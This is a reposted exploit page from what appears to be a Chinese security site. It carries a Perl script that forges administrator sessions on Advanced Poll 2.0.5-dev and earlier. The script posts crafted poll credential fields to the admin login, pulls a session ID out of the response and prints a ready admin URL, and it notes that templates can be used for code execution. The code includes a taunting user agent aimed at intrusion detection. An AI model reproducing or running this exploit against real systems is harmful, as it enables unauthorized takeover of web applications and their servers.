首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Advanced Poll <= 2.0.5-dev Remote Admin Session Generator Exploit
来源:diwou@phucksys.org 作者:diwou 发布时间:2007-02-08  
#!/usr/bin/perl -w
# Advanced Poll 2.0.0 >= 2.0.5-dev textfile admin session gen.
#
#
# 0day!  KEEP IT PRIVATE  0day!
#
# date: 30/07/06
#
# diwou <diwou@phucksys.org>
#
# PHCKSEC (c) 2001-2006.
#
# see templates for code execution ;).

use strict;
use warnings;
use LWP::UserAgent;
use MD5;

my ($lwp,$agent,$out,$url,$proxy)=(undef,undef,undef,$ARGV[0],$ARGV[1]);
my %zday=
(
username => 'jakahw4nk4h',
'pollvars[poll_username]' => 'jakahw4nk4h',
password => 'fuckoff',
'pollvars[poll_password]' => ''
);
$zday{'pollvars[poll_password]'}=&md5($zday{password});
$agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter.
#$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1";

#
# args: url proxy(optional)
#
# url: http|https://tatget:(port)/phppoll/
# proxy: http|https://hostname:(port)/
#
die("RTFC! ;)") unless(@ARGV);

# some lwp routines...
$lwp=new LWP::UserAgent();
$lwp->agent($agent);
$lwp->timeout(10);
$lwp->protocols_allowed(['http','https']);
$lwp->proxy(['http','https'],$proxy) if(@ARGV>1);

$url.="/" if($url!~/\/$/);
$url.="admin/index.php";
print "Using proxy ".$proxy."\n" if($proxy);
print "Doing some pretty with ".$url."...\n\n";

$out=$lwp->post($url,\%zday)->content();
if($out=~ /index\.php\?session=((.){32})/)
{
print "well, you are a bigone ;).\n";
print "try: ".$url."?session=".$1."&uid=1\n";
}
else
{
print "don't worry, u can improve me! eh eh eh :D?\n";
}

sub md5
{
$_=new MD5;
$_->add(@_);
return unpack("H*",$_->digest());
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Site-Assistant <= v0990 (paths
·LightRO CMS 1.0 (index.php pro
·阿里巴巴支付宝远程代码执行漏洞
·LushiNews <= 1.01 (comments.ph
·LushiWarPlaner 1.0 (register.p
·SmartFTP Client 2.0.1002 Remot
·Axigen <= 2.0.0b1 Remote Denia
·FlashFXP 3.4.0 build 1145 Remo
·Axigen <= 2.0.0b1 Remote Denia
·HP Tru64 Alpha OSF1 v5.1 (ps)
·SAP Web Application Server 6.4
·Oracle 9i/10g DBMS_EXPORT_EXTE
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved